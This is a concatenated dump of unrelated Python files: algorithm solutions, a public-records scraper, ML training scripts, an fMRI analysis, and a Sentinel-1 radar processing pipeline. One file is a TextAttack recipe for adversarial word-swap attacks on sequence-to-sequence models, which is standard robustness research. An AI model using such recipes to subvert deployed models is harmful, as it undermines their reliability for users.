"sr_metric": ["trainer.metric:PSNR", "trainer.metric:SSIM"],
"forecast": ["trainer.metric:MSE", "trainer.metric:RMSE"],
"r2score": ["trainer.metric:r2score", "trainer.metric:R2Score"],
})
| [
"[email protected]"
] | |
d9d15c7369252080d67b4a3db18eda581179e3b9 | 7950c4faf15ec1dc217391d839ddc21efd174ede | /contest/weekly-contest-266/5919.0_Vowels_of_All_Substrings.py | 836bcb1c21e6f95554a3972b51237f0616b166fa | [] | no_license | lixiang2017/leetcode | f462ecd269c7157aa4f5854f8c1da97ca5375e39 | f93380721b8383817fe2b0d728deca1321c9ef45 | refs/heads/master | 2023-08-25T02:56:58.918792 | 2023-08-22T16:43:36 | 2023-08-22T16:43:36 | 153,090,613 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,835 | py | '''
41 / 51 test cases passed
Status: Time Limit Exceeded
brute force over all substrings using the prefix-sum array below
T: O(N^2)
S: O(N)
'''
class Solution:
def countVowels(self, word: str) -> int:
N = len(word)
pre = [0] * (N + 1)
for i, ch in enumerate(word):
if ch in 'aeiou':
pre[i + 1] = pre[i] + 1
else:
pre[i + 1] = pre[i]
ans = 0
for i in range(1, len(word) + 1):
for j in range(i):
ans += pre[i] - pre[j]
return ans
'''
"aba"
0112
'''
'''
prefix sums of the prefix sums
optimized from the double-loop brute force above
Accepted
296 ms 23.8 MB Python3 2021/11/07 19:48
T: O(3N)
S: O(2N)
ref:
https://leetcode-cn.com/problems/vowels-of-all-substrings/solution/cqian-zhui-he-qian-zhui-he-by-answerer-360n/
'''
class Solution:
def countVowels(self, word: str) -> int:
N = len(word)
pre = [0] * (N + 1)
for i, ch in enumerate(word):
if ch in 'aeiou':
pre[i + 1] = pre[i] + 1
else:
pre[i + 1] = pre[i]
# presum of presum
prepre = [0] * (N + 1)
for i in range(1, N + 1):
prepre[i] = prepre[i - 1] + pre[i]
ans = 0
for i in range(N):
ans += pre[i + 1] * (i + 1) - prepre[i]
return ans
'''
counting (multiplication) principle: a vowel at index i appears in
(i + 1) * (N - i) substrings -- (i + 1) choices of left endpoint times
(N - i) choices of right endpoint.
T: O(N)
S: O(1)
Runtime: 92 ms, faster than 100.00% of Python3 submissions
Memory: 15.2 MB, less than 100.00% of Python3 submissions
Test cases passed: 51 / 51
'''
class Solution:
def countVowels(self, word: str) -> int:
ans, N = 0, len(word)
for i, ch in enumerate(word):
if ch in 'aeiou':
ans += (i + 1) * (N - i)
return ans
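# Added sanity check (not part of the original submission): compare the O(N)
# counting formula above against a direct enumeration of every substring.
if __name__ == "__main__":
    word = "aba"
    brute = sum(sum(c in "aeiou" for c in word[i:j + 1])
                for i in range(len(word)) for j in range(i, len(word)))
    assert Solution().countVowels(word) == brute == 6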
| [
"[email protected]"
] | |
958e5eceba3a97c5f73ae5f97c2f2d507c3228c4 | 8f8498bb6f56b19d45a1989c8113a077348c0a02 | /백준/최소신장트리/행성 터널 - 프림.py | 1b9cd115b4de9658e77fc0d211d97f40b0242f95 | [] | no_license | gjtjdtn201/practice | a09b437c892b0b601e156c09cb1f053b52fab11b | ea45582b2773616b2b8f350b927559210009d89f | refs/heads/master | 2021-01-01T13:29:46.640740 | 2020-11-28T00:55:37 | 2020-11-28T00:55:37 | 239,299,485 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 800 | py | import sys
sys.stdin = open('행성 터널.txt')
import sys
input = sys.stdin.readline
from heapq import heappush, heappop
N = int(input())
star = []
for i in range(N):
x, y, z = map(int, input().split())
star.append((x, y, z, i))
edges = [[] for _ in range(N)]
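# Note added for clarity (not in the original solution): the tunnel cost is
# min(|dx|, |dy|, |dz|), so along each axis only planets that are adjacent
# after sorting by that axis can ever contribute an MST edge. This keeps the
# candidate edge list at 3*(N-1) entries instead of O(N^2) before running
# Prim's algorithm below.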
for i in range(3):
star.sort(key=lambda x: x[i])
for j in range(N-1):
n1, n2 = star[j][3], star[j+1][3]
cost = abs(star[j][i]-star[j+1][i])
edges[n1].append((cost, n2))
edges[n2].append((cost, n1))
mst = [False]*N
ans = 0
q = []
heappush(q, (0, 0))
while q:
cost, node = heappop(q)
if mst[node]:
continue
ans += cost
mst[node] = True
for nxt_cost, nxt in edges[node]:
if mst[nxt]:
continue
heappush(q, (nxt_cost, nxt))
print(ans) | [
"[email protected]"
] | |
05bbe819c737091fa9d1aff4a383a5ca8734dd1c | 461cf2fd99330558ec96bf551cb1703e627868a0 | /get_pages.py | b050961df0e6de3f1240f8bc48e06c5237fb092d | [] | no_license | abelsonlive/bcni-pra | 408f72ba369ca164c5efb4442ebd2eaeb2c8dd78 | fa51ae45382c45f15fe861060d6e90cc00c27590 | refs/heads/master | 2021-01-20T11:50:13.432486 | 2013-04-29T14:45:04 | 2013-04-29T14:45:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 711 | py | import selenium
from selenium import webdriver
import time
URL = "http://secure.phila.gov/paplpublicweb/GridView.aspx"
b = webdriver.Firefox()
b.get(URL)
for i in range(2, 806):
print i
text = b.page_source.encode('utf-8')
fp = "raw_pages/page%s.txt" % (i-1)
print "writing", fp, "to file"
with open(fp, "w") as text_file:
text_file.write(text)
try:
next = b.find_element_by_xpath("//span[contains(text(),'%s')]" % (i))
    except (selenium.common.exceptions.NoSuchElementException, selenium.common.exceptions.StaleElementReferenceException):  # a tuple is needed to catch both; `or` would only register the first exception type
print "ERROR ERROR!!!"
        i = i - 1  # note: reassigning the loop variable does not rerun this page; the for loop overwrites i on the next pass
print "trying again"
next.click()
time.sleep(2)
b.close()
| [
"[email protected]"
] | |
a73c7308d19a2723bbdb73a89ceca2790e0ddbea | 3a10cda6dbdeee36b24591ada2c551ff2f179d19 | /app/models/hour.py | 1a14852b19fe5a1765504a13f12ccb678185c99c | [] | no_license | ttecles/weather_backend | a0d0c6317c3fde6c4ac6df17c7c9a5ea59299302 | b4b2886a3f0a2b6b502bd38d0b98f017b01ef6b0 | refs/heads/master | 2023-02-19T12:31:52.295041 | 2021-01-26T08:56:34 | 2021-01-26T08:56:34 | 330,950,429 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 763 | py | from app import db
class Hour(db.Model):
__tablename__ = 'Hour'
locality_id = db.Column(db.Integer, db.ForeignKey('Locality.id'), primary_key=True, nullable=False)
date = db.Column(db.Date(), primary_key=True) # "2021-1-15"
hour_data = db.Column(db.Time(), primary_key=True) # "13:00",
temperature = db.Column(db.Integer) # -1,
icon = db.Column(db.String(10)) # "6",
text = db.Column(db.String(80)) # "Mostly cloudy",
humidity = db.Column(db.Integer) # 89,
wind = db.Column(db.Integer) # 4,
wind_direction = db.Column(db.String(30)) # "Northwest",
icon_wind = db.Column(db.String(10)) # "NO",
pressure = db.Column(db.Integer) # 1016,
locality = db.relationship("Locality", backref="hour_forecast")
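# Illustrative usage (added; assumes an application context, an existing
# Locality row with id=1, and the sample values shown in the column comments):
#
#   from datetime import date, time
#   h = Hour(locality_id=1, date=date(2021, 1, 15), hour_data=time(13, 0),
#            temperature=-1, icon="6", text="Mostly cloudy", humidity=89,
#            wind=4, wind_direction="Northwest", icon_wind="NO", pressure=1016)
#   db.session.add(h)
#   db.session.commit()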
| [
"[email protected]"
] | |
8517ce3f417f877036d4b1f5d9af879c97c0a703 | e02506da0c661c8241fed00efdd0d6b2f8b147df | /textattack/attack_recipes/seq2sick_cheng_2018_blackbox.py | 8af6d15138de6bc314511c851970b1c226990123 | [
"MIT"
] | permissive | SatoshiRobatoFujimoto/TextAttack | 2592a828f128fd8bf0b8ce5578e9488df5b2ac97 | a809a9bddddff9f41750949e26edde26c8af6cfa | refs/heads/master | 2022-07-11T02:10:24.536157 | 2020-05-14T13:29:44 | 2020-05-14T13:29:44 | 263,941,825 | 1 | 0 | MIT | 2020-05-14T14:43:47 | 2020-05-14T14:43:46 | null | UTF-8 | Python | false | false | 1,205 | py | """
Cheng, Minhao, et al.
Seq2Sick: Evaluating the Robustness of Sequence-to-Sequence Models with
Adversarial Examples
ArXiv, abs/1803.01128.
This is a greedy re-implementation of the seq2sick attack method. It does
not use gradient descent.
"""
from textattack.constraints.overlap import LevenshteinEditDistance
from textattack.goal_functions import NonOverlappingOutput
from textattack.search_methods import GreedyWordSwapWIR
from textattack.transformations import WordSwapEmbedding
def Seq2SickCheng2018BlackBox(model, goal_function='non_overlapping'):
#
# Goal is non-overlapping output.
#
goal_function = NonOverlappingOutput(model)
# @TODO implement transformation / search method just like they do in
# seq2sick.
transformation = WordSwapEmbedding(max_candidates=50)
#
# In these experiments, we hold the maximum difference
# on edit distance (ϵ) to a constant 30 for each sample.
#
#
# Greedily swap words with "Word Importance Ranking".
#
attack = GreedyWordSwapWIR(goal_function, transformation=transformation,
constraints=[], max_depth=10)
return attack
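# Added usage sketch (illustrative only): the recipe is just a factory that
# wires the goal function, transformation and search method together.
# `my_seq2seq_model` is a placeholder for whatever model wrapper the
# NonOverlappingOutput goal function accepts; running the attack itself is
# handled by the surrounding TextAttack tooling.
#
#   attack = Seq2SickCheng2018BlackBox(my_seq2seq_model)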
| [
"[email protected]"
] | |
f9791b2b58c0ed0961046f7b8a0dd4bb73d8450a | 5410700e83210d003f1ffbdb75499062008df0d6 | /leetcode/tree2Str.py | 61ae648b31c803481fe3db7769a6109de4b7ac74 | [] | no_license | lilyandcy/python3 | 81182c35ab8b61fb86f67f7796e057936adf3ab7 | 11ef4ace7aa1f875491163d036935dd76d8b89e0 | refs/heads/master | 2021-06-14T18:41:42.089534 | 2019-10-22T00:24:30 | 2019-10-22T00:24:30 | 144,527,289 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 549 | py | class Solution:
def tree2str(self, t):
"""
:type t: TreeNode
:rtype: str
"""
if t == None:
return ""
if t.left == None and t.right == None:
return str(t.val)
elif t.left == None:
return str(t.val) + "()" + "(" + self.tree2str(t.right) + ")"
elif t.right == None:
return str(t.val) + "(" + self.tree2str(t.left) + ")"
else:
return str(t.val) + "(" + self.tree2str(t.left) + ")" + "(" + self.tree2str(t.right) + ")" | [
"[email protected]"
] | |
d3a92669d402c8e28659a759ac1a2d6cc27440b5 | 0add7953d3e3ce2df9e8265102be39b758579753 | /built-in/MindSpore/Research/cv/image_classification/FaceAttribute_for_MindSpore/train.py | a269bece0a922cf7323ebe7a7e5a57abd9157391 | [
"Apache-2.0"
] | permissive | Huawei-Ascend/modelzoo | ae161c0b4e581f8b62c77251e9204d958c4cf6c4 | df51ed9c1d6dbde1deef63f2a037a369f8554406 | refs/heads/master | 2023-04-08T08:17:40.058206 | 2020-12-07T08:04:57 | 2020-12-07T08:04:57 | 319,219,518 | 1 | 1 | Apache-2.0 | 2023-03-24T22:22:00 | 2020-12-07T06:01:32 | Python | UTF-8 | Python | false | false | 8,476 | py | # Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Face attribute train."""
import os
import time
import datetime
import argparse
import mindspore.nn as nn
from mindspore import context
from mindspore import Tensor
from mindspore.nn.optim import Momentum
from mindspore.communication.management import get_group_size, init, get_rank
from mindspore.nn import TrainOneStepCell
from mindspore.context import ParallelMode
from mindspore.train.callback import ModelCheckpoint, RunContext, _InternalCallbackParam, CheckpointConfig
from mindspore.train.serialization import load_checkpoint, load_param_into_net
from mindspore.ops import operations as P
from mindspore.common import dtype as mstype
from src.FaceAttribute.resnet18 import get_resnet18
from src.FaceAttribute.loss_factory import get_loss
from src.dataset_train import data_generator
from src.lrsche_factory import warmup_step
from src.logging import get_logger, AverageMeter
from src.config import config
devid = int(os.getenv('DEVICE_ID'))
context.set_context(mode=context.GRAPH_MODE, device_target="Ascend", save_graphs=True, device_id=devid)
class BuildTrainNetwork(nn.Cell):
def __init__(self, network, criterion):
super(BuildTrainNetwork, self).__init__()
self.network = network
self.criterion = criterion
self.print = P.Print()
def construct(self, input_data, label):
logit0, logit1, logit2 = self.network(input_data)
loss = self.criterion(logit0, logit1, logit2, label)
return loss
def parse_args():
parser = argparse.ArgumentParser('Face Attributes')
parser.add_argument('--mindrecord_path', type=str, default='', help='dataset path, e.g. /home/data.mindrecord')
parser.add_argument('--pretrained', type=str, default='', help='pretrained model to load')
parser.add_argument('--local_rank', type=int, default=0, help='current rank to support distributed')
parser.add_argument('--world_size', type=int, default=8, help='current process number to support distributed')
args, _ = parser.parse_known_args()
return args
def train():
# logger
args = parse_args()
# init distributed
if args.world_size != 1:
init()
args.local_rank = get_rank()
args.world_size = get_group_size()
args.per_batch_size = config.per_batch_size
args.dst_h = config.dst_h
args.dst_w = config.dst_w
args.workers = config.workers
args.attri_num = config.attri_num
args.classes = config.classes
args.backbone = config.backbone
args.loss_scale = config.loss_scale
args.flat_dim = config.flat_dim
args.fc_dim = config.fc_dim
args.lr = config.lr
args.lr_scale = config.lr_scale
args.lr_epochs = config.lr_epochs
args.weight_decay = config.weight_decay
args.momentum = config.momentum
args.max_epoch = config.max_epoch
args.warmup_epochs = config.warmup_epochs
args.log_interval = config.log_interval
args.ckpt_path = config.ckpt_path
if args.world_size == 1:
args.per_batch_size = 256
else:
args.lr = args.lr * 4.
if args.world_size != 1:
parallel_mode = ParallelMode.DATA_PARALLEL
else:
parallel_mode = ParallelMode.STAND_ALONE
context.reset_auto_parallel_context()
context.set_auto_parallel_context(parallel_mode=parallel_mode, gradients_mean=True, device_num=args.world_size)
# model and log save path
args.outputs_dir = os.path.join(args.ckpt_path, datetime.datetime.now().strftime('%Y-%m-%d_time_%H_%M_%S'))
args.logger = get_logger(args.outputs_dir, args.local_rank)
loss_meter = AverageMeter('loss')
# dataloader
args.logger.info('start create dataloader')
de_dataloader, steps_per_epoch, num_classes = data_generator(args)
args.steps_per_epoch = steps_per_epoch
args.num_classes = num_classes
args.logger.info('end create dataloader')
args.logger.save_args(args)
# backbone and loss
args.logger.important_info('start create network')
create_network_start = time.time()
network = get_resnet18(args)
criterion = get_loss()
# load pretrain model
if os.path.isfile(args.pretrained):
param_dict = load_checkpoint(args.pretrained)
param_dict_new = {}
for key, values in param_dict.items():
if key.startswith('moments.'):
continue
elif key.startswith('network.'):
param_dict_new[key[8:]] = values
else:
param_dict_new[key] = values
load_param_into_net(network, param_dict_new)
args.logger.info('load model {} success'.format(args.pretrained))
# optimizer and lr scheduler
lr = warmup_step(args, gamma=0.1)
opt = Momentum(params=network.trainable_params(),
learning_rate=lr,
momentum=args.momentum,
weight_decay=args.weight_decay,
loss_scale=args.loss_scale)
train_net = BuildTrainNetwork(network, criterion)
# mixed precision training
criterion.add_flags_recursive(fp32=True)
# package training process
train_net = TrainOneStepCell(train_net, opt, sens=args.loss_scale)
context.reset_auto_parallel_context()
# checkpoint
if args.local_rank == 0:
ckpt_max_num = args.max_epoch
train_config = CheckpointConfig(save_checkpoint_steps=args.steps_per_epoch, keep_checkpoint_max=ckpt_max_num)
ckpt_cb = ModelCheckpoint(config=train_config, directory=args.outputs_dir, prefix='{}'.format(args.local_rank))
cb_params = _InternalCallbackParam()
cb_params.train_network = train_net
cb_params.epoch_num = ckpt_max_num
cb_params.cur_epoch_num = 0
run_context = RunContext(cb_params)
ckpt_cb.begin(run_context)
train_net.set_train()
t_end = time.time()
t_epoch = time.time()
old_progress = -1
i = 0
for step_i, (data, gt_classes) in enumerate(de_dataloader):
data_tensor = Tensor(data, dtype=mstype.float32)
gt_tensor = Tensor(gt_classes, dtype=mstype.int32)
loss = train_net(data_tensor, gt_tensor)
loss_meter.update(loss.asnumpy()[0])
# save ckpt
if args.local_rank == 0:
cb_params.cur_step_num = i + 1
cb_params.batch_num = i + 2
ckpt_cb.step_end(run_context)
if i % args.steps_per_epoch == 0 and args.local_rank == 0:
cb_params.cur_epoch_num += 1
# save Log
if i == 0:
time_for_graph_compile = time.time() - create_network_start
args.logger.important_info('{}, graph compile time={:.2f}s'.format(args.backbone, time_for_graph_compile))
if i % args.log_interval == 0 and args.local_rank == 0:
time_used = time.time() - t_end
epoch = int(i / args.steps_per_epoch)
fps = args.per_batch_size * (i - old_progress) * args.world_size / time_used
args.logger.info('epoch[{}], iter[{}], {}, {:.2f} imgs/sec'.format(epoch, i, loss_meter, fps))
t_end = time.time()
loss_meter.reset()
old_progress = i
if i % args.steps_per_epoch == 0 and args.local_rank == 0:
epoch_time_used = time.time() - t_epoch
epoch = int(i / args.steps_per_epoch)
fps = args.per_batch_size * args.world_size * args.steps_per_epoch / epoch_time_used
args.logger.info('=================================================')
args.logger.info('epoch time: epoch[{}], iter[{}], {:.2f} imgs/sec'.format(epoch, i, fps))
args.logger.info('=================================================')
t_epoch = time.time()
i += 1
args.logger.info('--------- trains out ---------')
if __name__ == "__main__":
train()
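# Example launch (added for illustration; all paths and rank values are
# placeholders). DEVICE_ID must be set before the module is imported because
# the Ascend context above is created with device_id=int(os.getenv('DEVICE_ID')).
#
#   DEVICE_ID=0 python train.py \
#       --mindrecord_path /path/to/train.mindrecord \
#       --pretrained /path/to/pretrain.ckpt \
#       --world_size 1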
| [
"[email protected]"
] | |
7cc2c7507b75fcd535a7e8e9c9b0457f48bd6414 | e0b6f5bd451aa8af3273fbc948799637681342e1 | /scripts/wm_representation/functions/IEM/Controls/trial_by_trial/trainT_testT_wm3_shuffles_refs.py | 99a1066c8955feb220ec3514ad753bea566ad476 | [] | no_license | davidbestue/encoding | 6b304f6e7429f94f97bd562c7544d1fdccf7bdc1 | c27319aa3bb652b3bfc6b7340044c0fda057bc62 | refs/heads/master | 2022-05-05T23:41:42.419252 | 2022-04-27T08:34:52 | 2022-04-27T08:34:52 | 144,248,690 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,890 | py | # -*- coding: utf-8 -*-
"""
Created on Mon Jul 1 18:24:32 2019
@author: David Bestue
"""
#######
####### In this analysis:
####### Training the IEM on the delay period of the other sessions (leave-one-session-out) and testing on every TR of each trial, with the alignment reference angle drawn at random (shuffled references).
#######
############# Add to sys path the path where the tools folder is
import sys, os
#path_tools = os.path.abspath(os.path.join(os.getcwd(), os.pardir)) ### same directory or one back options
path_tools = os.path.abspath(os.path.join(os.getcwd(), os.pardir, os.pardir)) ### same directory or one back options
sys.path.insert(1, path_tools)
from tools import *
############# Namefiles for the savings.
path_save_reconst_shuffs ='/home/david/Desktop/Reconstructions/IEM/recs_shuffs_references_IEM_trainT_testT_wm3.npy'
############# Testing options
decoding_thing = 'T_alone' #'dist_alone' 'T_alone'
############# Training options
training_item = 'T_alone' #'dist_alone' 'T_alone'
cond_t = '1_7' #'1_7' '2_7'
Distance_to_use = 'mix' #'close' 'far'
training_time= 'delay' #'stim_p' 'delay' 'respo'
tr_st=4
tr_end=6
############# Elements for the loop
Conditions=['1_0.2', '1_7', '2_0.2', '2_7']
Subjects=['d001', 'n001', 'b001', 'r001', 's001', 'l001']
brain_regions = ['visual','ips', 'pfc', 'broca']
ref_angle=180
Reconstructions_ = [] ## subjects x brain regiond --> ntrials x 16 x 720 matrix
############# Analysis
#############
for Subject in Subjects:
for Brain_region in brain_regions:
enc_fmri_paths, enc_beh_paths, wm_fmri_paths, wm_beh_paths, masks = data_to_use( Subject, 'together', Brain_region)
activity, behaviour = process_wm_task(wm_fmri_paths, masks, wm_beh_paths, nscans_wm=nscans_wm)
behaviour['Condition'] = behaviour['Condition'].replace(['1.0_0.2', '1.0_7.0', '2.0_0.2','2.0_7.0' ], ['1_0.2', '1_7', '2_0.2', '2_7'])
behaviour['brain_region'] = Brain_region
###
###
print(Subject, Brain_region)
Reconstructed_trials=[] ## ntrials x 16 x 720 matrix
###
###
#angx = behaviour[decoding_thing].values
#angles_shuffled = random.sample( list(angx), len(angx) )
###
###
for trial in range(len(behaviour)):
activity_trial = activity[trial,:,:]
beh_trial = behaviour.iloc[trial,:]
session_trial = beh_trial.session_run
###
### Training
###
if cond_t == '1_7':
boolean_trials_training = np.array(behaviour['delay1']==7) * np.array(behaviour['order']==1) * np.array(behaviour['session_run']!=session_trial)
elif cond_t == '2_7':
boolean_trials_training = np.array(behaviour['delay1']==7) * np.array(behaviour['order']==2) * np.array(behaviour['session_run']!=session_trial)
#
activity_train_model = activity[boolean_trials_training, :, :]
activity_train_model_TRs = np.mean(activity_train_model[:, tr_st:tr_end, :], axis=1)
behavior_train_model = behaviour[boolean_trials_training]
training_angles = behavior_train_model[['T', 'NT1', 'NT2']].values
#
Weights_matrix, Interc = Weights_matrix_LM_3items(activity_train_model_TRs, training_angles)
Weights_matrix_t = Weights_matrix.transpose()
###
### Testing
###
Reconstructed_TR = [] ## 16 x 720 matrix
#
for TR_ in range(nscans_wm):
activity_TR = activity_trial[TR_, :]
angle_trial = random.choice([0,90,180,270])
Inverted_encoding_model = np.dot( np.dot ( np.linalg.pinv( np.dot(Weights_matrix_t, Weights_matrix ) ), Weights_matrix_t), activity_TR)
#Inverted_encoding_model_pos = Pos_IEM2(Inverted_encoding_model)
IEM_hd = ch2vrep3(Inverted_encoding_model) #36 to 720
to_roll = int( (ref_angle - angle_trial)*(len(IEM_hd)/360) ) ## degrees to roll
IEM_hd_aligned=np.roll(IEM_hd, to_roll) ## roll this degree ##vector of 720
Reconstructed_TR.append(IEM_hd_aligned)
##
resconstr_trial = np.array(Reconstructed_TR)
Reconstructed_trials.append(resconstr_trial)
##
##
Reconstructions_.append(Reconstructed_trials)
########
final_rec = np.array(Reconstructions_)
np.save(path_save_reconst_shuffs, final_rec)
############# Options de training times, the TRs used for the training will be different
# training_time=='delay':
# tr_st=4
# tr_end=6
# training_time=='stim_p':
# tr_st=3
# tr_end=4
# training_time=='delay':
# tr_st=4
# tr_end=6
# training_time=='respo':
# if decoding_thing=='Target':
# tr_st=8
# tr_end=9
# elif decoding_thing=='Distractor':
# tr_st=11
# tr_end=12 | [
"[email protected]"
] | |
98fa4703bd418ed584d3c0b4069f185a536db5ec | 87e7f159b48ad4e2b784c8846bed37e1825fb375 | /gamma/grd_batch_process.py | 2438f8c31f8555e79c2e0e4fb469c0d34b7b1584 | [] | no_license | whigg/GeorgeVI-surface-melt | 0db560640209911d5ef432ebf1fdef49b1f9957a | 0778de50fa747a4165273c9ef9edd65bf783fd34 | refs/heads/master | 2023-07-10T22:14:57.455070 | 2020-05-28T12:20:57 | 2020-05-28T12:20:57 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,982 | py | #activate the gamma environment in the shell
#gma
#geoutils
import os
import os.path
from os import path
import subprocess
from pyroSAR import identify
#import faulthandler; faulthandler.enable()
dem = "/exports/csce/datastore/geos/groups/MSCGIS/s2002365/code/data/DEM/REMA_resampled_10m.dem"
dem_par = "/exports/csce/datastore/geos/groups/MSCGIS/s2002365/code/data/DEM/REMA_resampled_10m.dem_par"
outdir = "/exports/csce/datastore/geos/groups/MSCGIS/s2002365/code/data/s1_grd/s1_grd_processed/grd_processed"
rootdir = '/exports/csce/datastore/geos/groups/MSCGIS/s2002365/code/data/s1_grd/'
study_area = '/exports/csce/datastore/geos/groups/MSCGIS/s2002365/code/study_area/study_area_square.shp'
surplus_files = '/exports/csce/datastore/geos/groups/MSCGIS/s2002365/code/data/s1_grd/s1_grd_processed/to_be_deleted/'
def unzip():
'''Unzips S1.zip files into .SAFE folders.'''
for dirname in os.listdir(rootdir):
if dirname.endswith(".zip"):
filename = str(dirname)[:-4]
#unzip S1 data to .SAFE file
if not path.exists(f"{rootdir}{filename}.SAFE"):
unzip = f"unzip {rootdir}{dirname} -d {rootdir}"
os.system(unzip)
print(f"{dirname} is now unzipped.")
def mk_POEORB_dir():
'''creates the file structure needed for the orbit files.
Make sure the correct orbit file is downloaded and placed inside the
POEORB directory before running the processGRD() function. '''
for dirname in os.listdir(rootdir):
if dirname.endswith(".SAFE"):
if not path.exists(f"{rootdir}{dirname}/osv/"):
os.makedirs(f"{rootdir}{dirname}/osv/")
print("Directories for orbit files created.")
def downloadOSV():
'''downloads the OSV file associated with each S1 image and places it into the correct file structure'''
for dirname in os.listdir(rootdir):
if dirname.endswith(".zip"):
filename = str(dirname)[:-4]
if path.exists(f"{rootdir}{filename}.SAFE/osv/"):
scene = f"{rootdir}{dirname}"
platform = str(dirname)[:3]
year = str(dirname)[17:21]
month = str(dirname)[21:23]
day = str(dirname)[23:25]
id = identify(scene)
id.getOSV(osvdir=f'{rootdir}{filename}.SAFE/osv/', osvType='POE') #downloads OSV file as a zip file located in {rootdir}/POEORB/S1B/2019/05/
if day != "01":
unzip = f"unzip {rootdir}{filename}.SAFE/osv/POEORB/{platform}/{year}/{month}/*.zip -d {rootdir}{filename}.SAFE/osv/POEORB"
else:
pre_month = int(month)-1
if pre_month > 9:
orb_month = str(pre_month)
else:
orb_month = '0'+ str(pre_month)
unzip = f"unzip {rootdir}{filename}.SAFE/osv/POEORB/{platform}/{year}/{orb_month}/*.zip -d {rootdir}{filename}.SAFE/osv/POEORB"
os.system(unzip)
else:
print(f"Correct file structure for OSV files does not exist: {dirname}.")
def processGRD():
'''Processes the Sentinel 1 data using the Gamma workflow'''
for dirname in os.listdir(rootdir):
if dirname.endswith(".SAFE"):
#set directory and file names
dir = f'{rootdir}{dirname}'
if path.exists(f"{dir}/osv/POEORB/"):
filename= str(dirname).lower().replace("_", "-")[:-10]
filenameHH = filename.replace("1ssh","hh").replace("grdh","grd")
#Generate MLI and GRD images and parameter files from a Sentinel-1 GRD product
par_command= f"par_S1_GRD {dir}/measurement/{filenameHH}-001.tiff {dir}/annotation/{filenameHH}-001.xml {dir}/annotation/calibration/calibration-{filenameHH}-001.xml - {dir}/{filenameHH}_HH_grd.par {dir}/{filenameHH}_HH_grd - - - - -"
os.system(par_command)
# correct orb files must be allocated beforehand in SAFE folder (/osv/POEORB)
for file in os.listdir(f'{dir}/osv/POEORB/'):
if file.endswith("EOF"):
orb = str(file)
#Extract Sentinel-1 OPOD state vectors and copy into the ISP image parameter file
opod = f"S1_OPOD_vec {dir}/{filenameHH}_HH_grd.par {dir}/osv/POEORB/{orb} -"
os.system(opod)
#Multi-looking of intensity (MLI) images
multilook = f"multi_look_MLI {dir}/{filenameHH}_HH_grd {dir}/{filenameHH}_HH_grd.par {dir}/{filenameHH}_HH_grd_mli {dir}/{filenameHH}_HH_grd_mli.par 2 2 - - -"
os.system(multilook)
#Calculate terrain-geocoding lookup table and DEM derived data products
gc_map = f"gc_map {dir}/{filenameHH}_HH_grd_mli.par - {dem_par} {dem} {dir}/{filename}_dem_seg_geo.par {dir}/{filename}_dem_seg_geo {dir}/{filename}_lut_init 1.0 1.0 - - - {dir}/{filename}_inc_geo - {dir}/{filename}_pix_geo {dir}/{filename}_ls_map_geo 8 2 -"
os.system(gc_map)
                #Calculate terrain-based sigma0 and gamma0 normalization area in slant-range geometry
pixel_area = f"pixel_area {dir}/{filenameHH}_HH_grd_mli.par {dir}/{filename}_dem_seg_geo.par {dir}/{filename}_dem_seg_geo {dir}/{filename}_lut_init {dir}/{filename}_ls_map_geo {dir}/{filename}_inc_geo - - - - {dir}/{filename}_pix_fine -"
os.system(pixel_area)
#Calculate product of two images: (image 1)*(image 2)
mli_samples = subprocess.check_output(f"grep samples {dir}/{filenameHH}_HH_grd_mli.par", shell=True)
mli_samples = str(mli_samples).replace("\n'","").split(' ')[-1][:-3]
print("MLI Samples:", mli_samples)
product = f"product {dir}/{filenameHH}_HH_grd_mli {dir}/{filename}_pix_fine {dir}/{filenameHH}_HH_grd_mli_pan {mli_samples} 1 1 -"
os.system(product)
#Geocoding of image data using a geocoding lookup table
dem_samples = subprocess.check_output(f"grep width {dir}/{filename}_dem_seg_geo.par", shell=True)
dem_samples = str(dem_samples).replace("\n'","").split(' ')[-1][:-3]
print("DEM Samples:", dem_samples)
geocode_back = f"geocode_back {dir}/{filenameHH}_HH_grd_mli_pan {mli_samples} {dir}/{filename}_lut_init {dir}/{filenameHH}_HH_grd_mli_pan_geo {dem_samples} - 2 - - - -"
os.system(geocode_back)
#Compute backscatter coefficient gamma (sigma0)/cos(inc)
sigma2gamma = f"sigma2gamma {dir}/{filenameHH}_HH_grd_mli_pan_geo {dir}/{filename}_inc_geo {dir}/{filenameHH}_HH_grd_mli_norm_geo {dem_samples}"
os.system(sigma2gamma)
#Conversion of data between linear and dB scale
linear_to_dB = f"linear_to_dB {dir}/{filenameHH}_HH_grd_mli_norm_geo {dir}/{filenameHH}_HH_grd_mli_norm_geo_db {dem_samples} 0 -99"
os.system(linear_to_dB)
#convert geocoded data with DEM parameter file to GeoTIFF format (dB)
data2geotiff = f"data2geotiff {dir}/{filename}_dem_seg_geo.par {dir}/{filenameHH}_HH_grd_mli_norm_geo_db 2 {outdir}/{filenameHH}_HH_grd_mli_norm_geo_db.tif -99"
os.system(data2geotiff)
#Produce different types of geotiffs (unhash lines below if want to create them)
#data2geotiff2 = f"data2geotiff {dir}/{filename}_dem_seg_geo.par {dir}/{filename}_inc_geo 2 {outdir}/{filename}_inc_geo.tif -99"
#os.system(data2geotiff2)
#data2geotiff3 = f"data2geotiff {dir}/{filename}_dem_seg_geo.par {dir}/{filename}_ls_map_geo 5 {outdir}/{filename}_ls_map_geo.tif 0"
#os.system(data2geotiff3)
print("I finished the scene")
else:
print(f"OSV files have not been downloaded: {dirname}.")
def transform_geotiff(): #Tested and works
'''Transforms geotiff into the UTM 19S projection (EPSG: 32719)'''
for geotiff in os.listdir(outdir):
if geotiff.endswith("db.tif"):
filename= str(geotiff)[:-4]
transform = f"gdalwarp -t_srs EPSG:32719 {outdir}/{filename}.tif {outdir}/{filename}_utm_19S.tif"
os.system(transform)
